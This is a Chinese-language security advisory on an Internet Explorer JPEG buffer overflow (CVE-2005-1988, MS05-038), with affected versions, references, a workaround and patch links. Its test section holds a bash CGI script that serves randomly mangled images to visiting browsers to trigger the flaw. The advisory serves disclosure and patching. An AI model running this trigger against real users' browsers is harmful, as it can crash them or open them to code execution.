发布日期：2005-07-18
更新日期：2005-08-09

受影响系统：

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 5.5 SP2
    - Microsoft Windows ME
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP SP2
    - Microsoft Windows Server 2003 SP1
    - Microsoft Windows Server 2003

描述：

---

BUGTRAQ  ID: 14282
CVE(CAN) ID: CVE-2005-1988

Microsoft Internet Explorer是非常流行的WEB浏览器。

Microsoft Internet Explorer浏览器所使用的JPEG图形渲染库中存在缓冲区溢出漏洞，成功的攻击可以导致执行任意代码。

起因是拷贝操作之前没有执行正确的边界检查。攻击者可以通过创建随机的浏览器输入来利用这个漏洞。

<*来源：Michal Zalewski （lcamtuf@echelon.pl）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=112144761123607&w=2
        http://www.microsoft.com/technet/security/Bulletin/MS05-038.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA05-221A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/bin/bash

echo "Content-Type: text/html"
echo

ID="timg-$$-$RANDOM-$RANDOM"

rm -f timg-* AFX.log

cat <<_EOF_
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" content="0;URL=/">
</HEAD>
<BODY>
_EOF_

CNT=0

for i in img/*; do
  CNT="$[CNT+1]"
  FNAM="$ID-$CNT"
  EXT=`echo $i | cut -d. -f2`
  ./afx-loc -p 1 -i 100 -m RANDOM -s 60000 <$i 2>$FNAM.$EXT >>AFX.log
  echo "Test $CNT - <IMG SRC=\"$FNAM.$EXT\"><BR>"
done

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 如果在使用Outlook 2002或之后版本，或Outlook Express 6 SP1或之后版本的话，以纯文本格式阅读e-mail消息可以帮助防范HTML e-mail攻击

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-038）以及相应补丁:
MS05-038：Cumulative Security Update for Internet Explorer (896727)
链接：http://www.microsoft.com/technet/security/Bulletin/MS05-038.mspx?pf=true

补丁下载：

Microsoft Windows 2000 Service Pack 4上的Internet Explorer 5.01 Service Pack 4 - 下载更新：
http://www.microsoft.com/downloads/details.aspx?FamilyId=194E0EE7-919C-4A8B-AD8D-01A4FE771942

Microsoft Windows 2000 Service Pack 4或Microsoft Windows XP Service Pack 1上的Internet Explorer 6 Service Pack 1 – 下载更新：
http://www.microsoft.com/downloads/details.aspx?FamilyId=68300B15-1CF9-45FB-875E-2EF6D2FBC9ED

Microsoft Windows XP Service Pack 2的Internet Explorer 6 – 下载更新：
http://www.microsoft.com/downloads/details.aspx?FamilyId=648B6F0E-1695-44E5-826A-43406DF4858E

Microsoft Windows Server 2003和Microsoft Windows Server 2003 Service Pack 1的Internet Explorer 6 – 下载更新：
http://www.microsoft.com/downloads/details.aspx?FamilyId=F0B96EC3-E954-423A-9AB0-5712B9F14637
    
Microsoft Windows Server 2003 for Itanium-based Systems和Microsoft Windows Server 2003 with SP1 for Itanium-based Systems的Internet Explorer 6 – 下载更新：
http://www.microsoft.com/downloads/details.aspx?FamilyId=C24D3738-213A-41B8-84A3-2842B34D7B10

Microsoft Windows Server 2003 x64 Edition的Internet Explorer 6 – 下载更新：
http://www.microsoft.com/downloads/details.aspx?FamilyId=F2D544E7-33F5-4A65-A574-15495B05B883

Microsoft Windows XP Professional x64 Edition的Internet Explorer – 下载更新：
http://www.microsoft.com/downloads/details.aspx?FamilyId=1181BC67-0A1D-4A06-99AC-5B2BC6DFE0F6

浏览次数：5435
严重程度：27（网友投票）